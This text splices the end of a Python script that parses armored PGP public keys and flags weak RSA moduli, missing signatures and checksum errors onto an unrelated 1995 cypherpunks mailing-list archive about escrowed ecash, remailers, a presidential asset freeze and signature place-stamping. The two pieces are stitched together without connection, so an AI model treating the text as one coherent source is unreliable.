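    lines = [ln.strip() for ln in text.strip().splitlines()]
    if (not lines or not lines[0].startswith("-----BEGIN PGP")
            or not lines[-1].startswith("-----END PGP")):
        raise ValueError("not an armored PGP block")
    body = lines[lines.index("") + 1:-1]  # a blank line ends the armor headers
    checksum = None
    if body and body[-1].startswith("=") and len(body[-1]) == 5:
        checksum = int.from_bytes(base64.b64decode(body.pop()[1:]), "big")
    data = base64.b64decode("".join(body), validate=True)
    return data, (None if checksum is None else checksum == crc24(data))


def read_packets(data):
    """Yield (tag, body) for each old-format OpenPGP packet."""
    pos = 0
    while pos < len(data):
        ctb = data[pos]
        if not ctb & 0x80 or ctb & 0x40:
            raise ValueError("only old-format packets are handled here")
        tag, length_type = (ctb >> 2) & 0x0F, ctb & 0x03
        if length_type == 3:
            raise ValueError("indeterminate-length packets are not handled")
        nlen = 1 << length_type  # 1, 2 or 4 length octets
        length = int.from_bytes(data[pos + 1:pos + 1 + nlen], "big")
        start = pos + 1 + nlen
        if start + length > len(data):
            raise ValueError("truncated packet")
        yield tag, data[start:start + length]
        pos = start + length


def read_mpi(buf, pos):
    """Read a multiprecision integer: 2-octet bit count, then the value."""
    nbytes = (int.from_bytes(buf[pos:pos + 2], "big") + 7) // 8
    return int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big"), pos + 2 + nbytes


def inspect_key(text):
    """Summarise a v2/v3 RSA public key block and list policy warnings."""
    data, crc_ok = dearmor(text)
    report = {"armor_crc_ok": crc_ok, "user_ids": [], "warnings": []}
    tags = []
    for tag, body in read_packets(data):
        tags.append(tag)
        if tag == 6:  # public-key packet
            if body[0] not in (2, 3) or body[7] != 1:
                raise ValueError("only v2/v3 RSA keys are handled here")
            n, pos = read_mpi(body, 8)  # after version, time, validity, algorithm
            e, _ = read_mpi(body, pos)
            created = datetime.fromtimestamp(
                int.from_bytes(body[1:5], "big"), timezone.utc)
            report.update(version=body[0], created=created.date().isoformat(),
                          modulus_bits=n.bit_length(), exponent=e,
                          key_id=format(n & 0xFFFFFFFFFFFFFFFF, "016X"))
        elif tag == 13:  # user ID packet
            report["user_ids"].append(body.decode("latin-1"))
    if 6 not in tags:
        raise ValueError("no public-key packet found")
    if report["modulus_bits"] < MIN_RSA_BITS:
        report["warnings"].append("%d-bit RSA modulus is below the %d-bit floor"
                                  % (report["modulus_bits"], MIN_RSA_BITS))
    if 2 not in tags:
        report["warnings"].append("no signature packet: the user ID is not "
                                  "bound to the key by any signature")
    if crc_ok is False:
        report["warnings"].append("armor checksum mismatch: block was altered "
                                  "or damaged in transit")
    return report


if __name__ == "__main__":
    for field, value in inspect_key(ARMORED_KEY).items():
        print(field, "=", value)
```

The armor checksum only detects accidental damage; authenticity of a key still has to come from comparing its fingerprint over a separate channel.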




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 03:49:05 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Pseudo-anon Ecash with GAK -- Sandia Proposal
Message-ID: <199501241150.GAA01617@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


While browsing through the program for the 6th annual ACM-SIAM SODA
(http://www.netlib.org/confdb/soda95/prog.html), which concludes today in SF,
I noticed the following scheduled for this morning:

8:55 
   Trustee-based Tracing Extensions to Anonymous Cash and the Making of
   Anonymous Change 
   Ernie Brickell, Peter Gemmell and David Kravitz, Sandia National
   Laboratories, Albuquerque 

I haven't been able to find a pointer to an actual paper, but I did find an
abstract of sorts at http://www.cs.sandia.gov/HPCCIT/el_cash.html. Their
proposal purports to elaborate the notion of GAK ("key escrow") to cover
an otherwise-anonymous ecash system, according to my reading of this.
Caveat emptor.

Here's an extended excerpt of the doublespeech:

"We introduce the first electronic cash system that incorporates trustee-based
tracing, while provably protecting user anonymity. This effort expands on
provably anonymous electronic cash systems. Our system maintains completely
provable user anonymity with the exception that, only with the cooperation of
several publicly appointed trustees (e.g. key-escrow agents), the government 
can trace a user's spending with certainty, determining to whom the user gave
his/her money and how much s/he gave. The trustees can answer the question of
whether a particular payment was made by a particular user, without revealing
any additional information. This allows for authorized forward and backward
tracing that does not impinge on the privacy of anyone other than the parties 
of the one transaction in question. Some of our trustee-based tracing require 
no tamper-resistant hardware, and all can be implemented as either on-line or
off-line systems."

Electronic cash is a subject of great economic, political, and research
importance. With advances in computer networks, in processor speed, and in
databases, and with advances in note counterfeiting technology and with both
individuals' and businesses' desire for remote and more convenient financial
transactions, some forms of electronic cash are likely to become widespread
within 5 to 10 years. Although unconditionally anonymous electronic cash 
systems have been proposed in the literature, governmental and financial 
institutions are unwilling to back a completely anonymous system. Their 
reasons for opposing complete untraceability have to do with the containment 
of user fraud and the desire to restrict the new kinds of crime that 
unrestricted, remotely withdrawable, and spendable electronic cash could 
facilitate. Because of the necessary concern over crime control, they have 
previously proposed systems with little or no protection for the users' 
privacy. Our system provides the capability required by government for crime 
control while maintaining privacy for all other users."

 -L. Futplex McCarthy; PGP key by finger or server; I'm seeking an internship/
  job for summer 1995 --- BS CS Cornell / 2 yrs. MS-level work in algebraic
  algorithms, Ph.D. planned --- send private email for resume etc.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 24 Jan 95 07:02:02 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <199501241215.GAA00443@einstein.ssz.com>
Message-ID: <199501241501.HAA21364@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: root <root@einstein.ssz.com>

   Exactly how does this work at your location Eric? Here in Southwestern Bell
   we don't use the D except for call initiation and termination. There is no
   usage tariff other than this. 

The standard residential tariff here in Pac Bell is flat rate during
non-business hours and per-minute during them.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Mon, 23 Jan 95 14:10:47 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501222311.A9801-0100000@netcom19>
Message-ID: <9501240859.ZM18615@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 23, 12:06am, James A. Donald wrote:
> Church of England in Australia was, and I believe still is, government
> funded by the Australian government.

Please substantiate.  I am aware of no government funding to the
Anglican Church in Australia.

> Furthermore when my kids went to government school in NSW, Australia,
> they were taught Church of England religion by my neighbor, Mrs Law,
> in school, in the classroom.

When I went to school (government school) the religion taught depended on
exactly who they could get to teach it.  If they could get COE, they got
COE.  If they could get Catholic, they got Catholic.  If they couldn't,
the rest of the kids got shoved into whichever group seemed most
appropriate, or allowed not to attend scripture at all.  This led to
some interesting mixes, and some interesting people to teach it
(my favorite was a guy who had been in the Belgian Resistance during
WWII, and had been war-wounded by a German soldier.  It took us the
whole term to get it out of him that he'd been shot in the butt.)

I'd also point out the funding to private religious schools does not
discriminate on the basis of religion.  Hardly indicative of a state
religion, surely.

> If it quacks like a duck ...

And if it doesn't, it's not a duck.

> I suspect that the government and the church are none too clear on it
> either.

Hmmm... try as I might, I cannot think of a recent decision which
received any specific denominational influence.  Even the Festival of
Light is becoming a political irrelevancy.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Tue, 24 Jan 95 09:11:29 PST
To: cypherpunks@toad.com
Subject: Here's what will happen to U.S. based remailers
Message-ID: <199501241711.JAA01094@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


I just got a call.  Supposedly Clinton just pulled an executive order
out of his navel last night, confiscating the assets of 12 "terrorist 
groups" and 18 disfavored people.  CNN is reporting a few of the names, 
but not all.  The ones they mention are associated with groups like 
"Islamic Jihad".  These groups are hard to defend, but if he can do it 
to them today, he can do it to you tomorrow.

My old German acquaintance says that Hitler used to do this, issuing
midnight decrees to seize property, make new prohibitions, etc.

I assume that the Republican congress approves of what Bill is doing,
or they would be impeaching him.  After November 8, I thought we had
a couple of years of breathing room.  Now, I'm not so sure.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Tue, 24 Jan 95 10:35:09 PST
To: cypherpunks@toad.com
Subject: Clinton freezes U.S. assets of Mideast groups
Message-ID: <199501241834.KAA13284@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



here's something I found in my mailbox:

___
	 WASHINGTON (Reuter) - President Clinton has ordered a freeze
on the U.S. assets of 12 Middle East ``terrorist'' groups, the
White House said Tuesday.
    White House spokesman Mike McCurry said Clinton had signed
an executive order ``to block the assets in the United States of
certain terrorist organizations that threaten to disrupt the
peace process'' in the Middle East.
	 ``The action will specifically prohibit certain kinds of
financial transactions with these groups,'' McCurry said.
	 The groups include Hamas, Hizbollah, Islamic Jihad, Abu
Nidal, Black September, the Fatah Revolutionary Council, Kach,
the Palestine Liberation Front, and the Islamic Group, McCurry
said.
	 He did not name the others, but said there would be more
information released at a 2 p.m. EST White House briefing with
officials from the Treasury, State and Justice departments and
the National Security Council.
	 Under the order, charitable contributions to these groups in
the United States will also be blocked, McCurry said. He said
Clinton had also frozen the U.S. assets of 18 individuals
suspected of involvement in Middle East terrorism, but McCurry
did not name them.
	 Clinton signed the order Monday night and it took effect at
midnight EST the same day, McCurry said. He said the president
acted under the authority of the International Emergency
Economic Powers Act.
	 Clinton plans to discuss the matter in his State of the
Union address to Congress Tuesday night, McCurry said.
	 ``One of the things the president will address in the State
of the Union tonight is the new world in which we live, in
which there are new types of threats to our security and to
global security,'' he told reporters in his office.
	 ``We just had a very painful and tragic reminder of that in
Israel in recent days, and that's the impact of terrorism,''
McCurry said, referring to a weekend terrorist bombing that
killed 18 Israeli soldiers and a civilian. Islamic Jihad claimed
responsibility for the bombing.
    McCurry said the decision was the result of a detailed and
lengthy review within the U.S. government of how to combat
terrorism. The goal was to make it harder for these groups to
finance their activities by cutting off their U.S. sources of
support and blocking their access to the U.S. financial system,
he said.
	  Clinton is also preparing anti-terrorist legislation,
McCurry said.
	 ``We do need additional legislation that would further
assist the efforts to combat terrorism, and the president will
soon send the Congress a comprehensive anti-terrorism package
that would strengthen our ability to prevent terrorist acts, to
identify those who perpetrate violent acts and bring them to
justice,'' McCurry said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Tue, 24 Jan 95 07:46:16 PST
To: Harry Bartholomew <bart@netcom.com>
Subject: Re: DOJ Computer Seizure Guidelines
In-Reply-To: <199501241124.DAA24739@netcom17.netcom.com>
Message-ID: <Pine.3.89.9501241047.B21387-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



Actually we didn't have to sue them for once to get it. I guess 
they wanted to make it public. The encryption section is interesting. 
They seem to be admitting that there are 5th amendment issues related to 
disclosing your key and that they may have to immunize people before 
forcing them to give their keys up.

Dave


On Tue, 24 Jan 1995, Harry Bartholomew wrote:

> 
>     Seen on comp.society.privacy.  This document was obtained
>     by an FOIA suit by EPIC. I ftp'd from the cpsr.org but even
>     at 2:30 a.m. PST the 315 Kbytes took an excruciating 481 seconds.
> 
>     For those on netcom it's on /ftp/pub/ba/bart easily available,
>     if others can get through to ftp.netcom.com at least the
>     transfer might be faster than cpsr.
> 
>     Encrypted information is dealt with on pps 54-55 in particular.
>     I'll leave conclusions to our lawyerly types.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Mon, 23 Jan 95 15:53:08 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501222311.A9801-0100000@netcom19>
Message-ID: <Pine.SUN.3.91.950124104650.28961G-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, James A. Donald wrote:

> Church of England in Australia was, and I believe still is, government 
> funded by the Australian government.

As are many other schools of various religious persuasions.  So?

> Furthermore when my kids went to government school in NSW, Australia,
> they were taught Church of England religion by my neighbor, Mrs Law, 
> in school, in the classroom.  

It's not compulsory - as an avowed atheist I always avoided them.

> If it quacks like a duck ...

Not necessarily...  If they fund one school, they can hardly refuse
to fund others.

> I was unaware of the portion of the constitution that you mention.

Obviously - it's handy having an on-line copy of the Australian
Constitution.  Anyone want a copy?  I don't run an FTP site.

> I suspect that the government and the church are none too clear on it
> either.

You might be amused to know that our Governor-General (the "Queen's Man")
is himself an avowed atheist - is it likely he would have been appointed
by a pro-religious government?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 24 Jan 95 11:58:38 PST
To: joshua geller <joshua@dee.retix.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501241834.KAA13284@sleepy.retix.com>
Message-ID: <Pine.3.89.9501241122.A12422-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


The Eurodollar market got started because Russia feared 
arbitrary confiscation of its dollar bank accounts.

In the West, we see governments arbitrarily and
capriciously stealing financial assets.

As a result first world banking no longer has a large
advantage over third world banking.

This will eventually inject serious money into cyberspace
financial institutions -- once they exist, run smoothly,
have credible audit trails and a reputation.

At present it seems to me that unix machines on the internet
are intrinsically insecure -- the methods used to secure them
are a collection of ad hoc patches.  For example all
unix machines are vulnerable to the trojan
horse attack.

(I expect the usual flame from Perry that I am stupefyingly
ignorant and that that is all fixed or will be shortly 
-- no Perry it is not all fixed -- it cannot be fixed.  
The necessary fixes have to be designed in at the
beginning.)

In consequence finance software running on the internet is
only acceptable for small time stuff.

Windows NT is supposedly secure.  Certainly its design makes
it possible to write software that is intrinsically secure,
rather than creating a particular fix for each particular
hole.   The perimeter you have to defend is much smaller
and easier to explore.

On the other hand existing Unix security is probably
adequate for immediately proposed uses of internet
money -- selling beads and trinkets.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 24 Jan 95 12:36:27 PST
To: Brad Dolan <bdolan@well.sf.ca.us>
Subject: Re: Here's what will happen to U.S. based remailers
Message-ID: <v01510101ab4b13590a65@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:11 AM 1/24/95, Brad Dolan wrote:
>I just got a call.  Supposedly Clinton just pulled an executive order
>out of his navel last night, confiscating the assets of 12 "terrorist
>groups" and 18 disfavored people.  CNN is reporting a few of the names,
>but not all.  The ones they mention are associated with groups like
>"Islamic Jihad".  These groups are hard to defend, but if he can do it
>to them today, he can do it to you tomorrow.
>
>My old German acquaintance says that Hitler used to do this, issuing
>midnight decrees to seize property, make new prohibitions, etc.

Many years ago, I read a poem by a German priest that stated that the Nazis
first start with the groups that nobody likes, then those that most people
don't like, until at last they knock on your door.

The more things change, the more they stay the same?



-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Tue, 24 Jan 95 12:54:56 PST
To: slowdog@chewy.wookie.net
Subject: Re: Clinton's Executive Order
In-Reply-To: <Pine.LNX.3.91.950124152256.23455A-100000@chewy.wookie.net>
Message-ID: <199501242054.MAA13425@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   Anyone know just what the International Emergency Economic Powers Act is, 
>   and what else a President could in theory do with it?

the president can do just about anything he wants with an executive
order. of course if he did certain things he would be likely to get
impeached, or challenged in the courts.

theoretically, what with being commander in chief of the armed forces,
the president can do anything he wants up to and including the declaration
of martial law.

I don't expect that to happen this year.

josh









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Tue, 24 Jan 95 12:59:59 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <199501242057.MAA06586@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199501240400.UAA20706@largo.remailer.net> you write:
>   From: wcs@anchor.ho.att.com
>
>   Tim writes:
>   > One thing I should've noted is that a Linux-based cheap remailer is
>   > mostly useless without a "live connection" to the Net. 
>
>   I disagree - live connections  are great for fast-response systems,
>   but we got along just fine in the uucp dialup world with occasional
>   connections; 
>
>And if you get someone to do secondary MX for you that _is_ fulltime
>connected, then the only latency for mail is the poll time.

I offer to MX, store and forward mail for anyone who wants to run
a remailer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@vail.tivoli.com (Mike McNally)
Date: Tue, 24 Jan 95 13:17:29 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501241834.KAA13284@sleepy.retix.com>
Message-ID: <9501242116.AA04128@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald writes:
 > For example all unix machines are vulnerable to the trojan
 > horse attack.

*The* trojan horse attack?  I'm not sure I understand that
phraseology; it (methinks, perhaps out of confusion) seems like saying
that JFK International is vulnerable to attack by the terrorist.

| GOOD TIME FOR MOVIE - GOING ||| Mike McNally <m5@tivoli.com>       |
| TAKE TWA TO CAIRO.          ||| Tivoli Systems, Austin, TX:        |
|     (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Tue, 24 Jan 95 12:23:43 PST
To: cypherpunks@toad.com
Subject: Clinton's Executive Order
Message-ID: <Pine.LNX.3.91.950124152256.23455A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know just what the International Emergency Economic Powers Act is, 
and what else a President could in theory do with it?


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkirksey@world.std.com (Ken Kirksey)
Date: Tue, 24 Jan 95 12:43:32 PST
To: cypherpunks@toad.com
Subject: Money and Banking
Message-ID: <199501242043.AA18840@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-Id: <v01510103ab4996dfb4fc@DialupEudora>

This came to me from the Laissez Faire mailing list.   Looks like this
book might present a good case for non-government e-cash.

Ken

----------------------------------------------

A powerful case for "free banking"--
government failure far worse than market failure

MONEY AND BANKING
The American Experience
George Edward Durell Foundation
introduction by Clifford F. Thies
(reviewed by Jim Powell)

     This comprehensive history of American banking helps show
why the most serious monetary crises occur because of government
failures, not market failures. Consequently, we need less
government intervention in banking, not more. Ultimate objective:
"free banking" which would enable everyone to be best-protected
by open competition.
     Contributors here include many leading lights of "free
banking" scholarship and central bank criticism: Kevin Dowd,
Jeffrey Rogers Hummel, Dwight Lee, J. Huston McCulloch, Joseph T.
Salerno, Anna J. Schwartz, George A. Selgin, Richard Timberlake
and Lawrence H. White. Their papers--10 altogether--were
originally presented at the 1990 Durell Conference on Money and
Banking.
     They cover the entire history of banking in the United
States. They show why, contrary to conventional dogmas, "free
banks" were remarkably dependable and gained widespread
acceptance for their banknotes... how private bank clearinghouse
associations helped maintain overall stability while disciplining
bad bankers.
     The authors go on to make clear why banking crises resulted
from government intervention... how states undermined "free
banks" by forcing them to load up with state government debt,
often defaulted on... four ways Civil War era federal banking
laws hobbled the U.S. banking system... how government-enforced
unit banking (no branches permitted) promoted bank failures,
especially in agricultural and mining regions... why government
deposit insurance triggered conflagrations of corruption and
banking crises... why U.S. banking was decidedly more stable
before the advent of the Federal Reserve System--and how it
caused chronic inflation as well as crushing depression.
     This book shares many other revealing insights as well. For
example, why the Supreme Court once ruled that legal tender laws
violate the Fifth Amendment... how, despite their wretched
failures, Federal Reserve officials successfully lobbied for even
more power over banking and the economy. Excellent material here.

     "Virtually all major monetary and banking problems in U.S.
history appear to have their root cause in government
interference of some sort. The major historical banking problems--
banking instability before the Civil War, banking instability,
recurrent financial crisis, the inelastic currency, and the
stunted growth of U.S. banking after the Civil War; the banking
instability of the 1920's and the banking collapses of the
1930's, and the failures of historical and contemporary liability
insurance schemes--can all be traced to a great or lesser extent
to government interference in banking."
--Kevin Dowd in *Money and Banking*

Book No. CB6245 (hardcover) 271p.    publisher's price $59.50
                              LAISSEZ FAIRE PRICE ONLY $29.95

-------------------------------------------------------------------
Please send this review to anyone who you think might be interested
-------------------------------------------------------------------

*Money and Banking* will be available from Laissez Faire this week.  You 
can order it now.  Call toll-free 1-800-326-0996 or (415) 541-9780, fax 
(415) 541-0597 or write to: Laissez Faire Books, Dept. L41, 938 Howard 
St., #202, San Francisco, CA, 94103.  To order via E-MAIL: Simply reply to 
LFB@panix.com, or write to Eric Shoemaker, our customer service manager, at 
74741.2631@compuserve.com.  For your security, you might want to first 
call and leave us your credit card information and mailing address. (If 
you're already a customer we probably have it.)  After that you can 
order at anytime by e-mail using only your name and the zip code of the 
address we have on file. (Your zip code will verify your identity.)  We 
will process your order using the card and address we have. (If you 
would prefer to pay by check, you can join our pay-in-advance book club, 
and order in the same way. Call or e-mail for details.)

* Every order comes with a surprise free gift
* 30-day money back guarantee

You can pay for your order with a Visa, MasterCard, or Discover, or with 
a check or money order.  Include $4.35 for shipping.  California  
residents must include sales tax.

If you have any questions or comments, feel free to let me know.



Thanks,

Chris

-------------------------------------------------------
Chris Whitten                             LFB@panix.com 
Laissez Faire Books                      1-800-326-0996
---The world's largest selection of books on liberty---
-------------------------------------------------------
Ask me about free Book News e-mail list, print catalog,
http://www.xmission.com/~legalize/lf/Laissez-Faire.html
-------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Tue, 24 Jan 95 12:58:39 PST
Subject: Re: Clinton's Executive Order
In-Reply-To: <199501242054.MAA13425@sleepy.retix.com>
Message-ID: <Pine.LNX.3.91.950124155749.23538A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, joshua geller wrote:

> >   Anyone know just what the International Emergency Economic Powers Act is, 
> >   and what else a President could in theory do with it?
> 
> the president can do just about anything he wants with an executive
> order. of course if he did certain things he would be likely to get
> impeached, or challenged in the courts.
> 
> theoretically, what with being commander in chief of the armed forces,
> the president can do anything he wants up to and including the declaration
> of martial law.

Yes I understand all this. But what specifically is the IEEP Act?


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 24 Jan 95 14:17:52 PST
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <v01510101ab4b13590a65@[192.0.2.1]>
Message-ID: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Jan 1995, Lucky Green wrote:

> Many years ago, I read a poem by a German priest that stated that the Nazis
> first start with the groups that nobody likes, then those that most people
> don't like, until at last they knock on your door.
> 
> The more things change, the more they stay the same?

Is this the poem, Lucky?

     They [Nazis] came first for the Communists,
and I didn't speak up because I wasn't a Communist.
     Then they came for the Jews, 
and I didn't speak up because I wasn't a Jew.
     Then they came for the Catholics, 
and I didn't speak up because I was a Protestant.
     Then they came for me,
and by that time there was no one left to speak up.
                         - Martin Niemller

Seems appropriate lately, doesn't it?

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Tue, 24 Jan 95 13:27:17 PST
To: cypherpunks@toad.com
Subject: new domain name for mg5n+alias@andrew.cmu.edu
Message-ID: <m0rWsmN-0006UUC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Addresses on my alias server of the form
mg5n+alias!username@andrew.cmu.edu, can now also be reached at
username@wormhole.jpunix.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 13:35:30 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Shell's authentication needs
In-Reply-To: <9501211317.AA00188@sulphur.osf.org>
Message-ID: <199501242136.QAA02364@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz writes:
> Shell needs public key because they want to use email for legal contracts.
> They've been waiting for standards to come around, but have given up.
> They're currently planning on using NIST's DSS, if they can fix a few things:
>     -	Add concepts of time and location (it can be important to prove
> 	that this was signed last month outside of the U.S.)

Any thoughts on how digital "place-stamping" (analogous to timestamping) might
be accomplished, to authenticate the location of origin of a document ?

 -L. McCarthy / seeking a summer job/internship; BS CS Cornell & 2 years'
  grad work in theoretical CS (algebraic algorithms); private email for info



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 24 Jan 95 16:19:35 PST
To: cypherpunks@toad.com
Subject: CP archives?
Message-ID: <m0rWvRj-0004JGC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Can anyone tell me where the CP mailing list is archived?  Thanks!
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Ramstad <rramstad@nfic.com>
Date: Tue, 24 Jan 95 15:02:57 PST
To: cypherpunks@toad.com
Subject: wall street journal television piece
Message-ID: <9501242300.AA00958@www.nfic.com>
MIME-Version: 1.0
Content-Type: text/plain



wall street journal television is looking for someone who can talk to
them (anonymously if necessary) about computer system security,
specifically, breaking in.  ideally they are looking for someone who
can appear on camera in NYC (again, anonymously if necessary) for a
taping in the next day or two.

this is apparently in response to a recent New York Times article
about a christmas day break in.  the person doing the piece has an
email address which i'll pass on to anyone who wants to talk with her.
she has indicated that she is interested in getting the big picture,
though anything is possible with the press, she sounds like she is
hoping to desensationalize / make more realistic some of the
inaccurate info in the NYT.

please contact me if you are interested, and i'll forward email on to
her so she can get back to you.  feel free to use any of the anonymous
email remailer services if that is appropriate.

i'm not on this list, apologies if this is inappropriate, and please
cc me on any relevant communication.  yowsa.

-- Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 15:07:49 PST
To: cypherpunks@toad.com
Subject: Archive of Remailer-Operators List Begun
Message-ID: <199501242308.SAA02649@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have begun an archive of the remailer-operators list. I've just placed a
gzipped file containing the traffic from the last couple of weeks, plus some
scattered previous traffic, in //ftp.csua.berkeley.edu/incoming. If/when I
learn the ultimate fate of this file, I'll provide further details.

 -L. Futplex McCarthy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 24 Jan 95 15:31:16 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Shell's authentication needs
Message-ID: <ab4b3db603021004cb5d@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:36 PM 01/24/95, L. McCarthy wrote:
>Rich Salz writes:
>> Shell needs public key because they want to use email for legal contracts.
>> They've been waiting for standards to come around, but have given up.
>> They're currently planning on using NIST's DSS, if they can fix a few things:
>>     - Add concepts of time and location (it can be important to prove
>>       that this was signed last month outside of the U.S.)
>
>Any thoughts on how digital "place-stamping" (analogous to timestamping) might
>be accomplished, to authenticate the location of origin of a document ?

Well, it clearly can't be done over the internet.   But it's really just a
matter of putting a "place" field within the signature, in addition to the
"time" one.   And you'd have to trust the "stamper" to only stamp stuff as
"Cleveland" that he had a way of knowing was in Cleveland. It's really up
to him to figure out a way of verifying that. Maybe American Express
offices will start place/time stamping, and you have to physically go to
the AE office in Cleveland OH where someone takes your file and place/time
stamps it.
It's not as elegant as time stamping, because you really need face-to-face
contact. And you need to trust the stamper not to lie about his location (I
can't remember how much you need to trust a time-stamper, but I think it's
less).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 24 Jan 95 15:36:19 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
Message-ID: <9501242335.AA14267@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> At present it seems to me that unix machines on the internet
> are intrinsically insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.
> 
> (I expect the usual flame from Perry that I am stupefyingly
> ignorant and that that is all fixed or will be shortly 
> -- no Perry it is not all fixed -- it cannot be fixed.  

Actually, I would be curious to find out from James what the hell he's
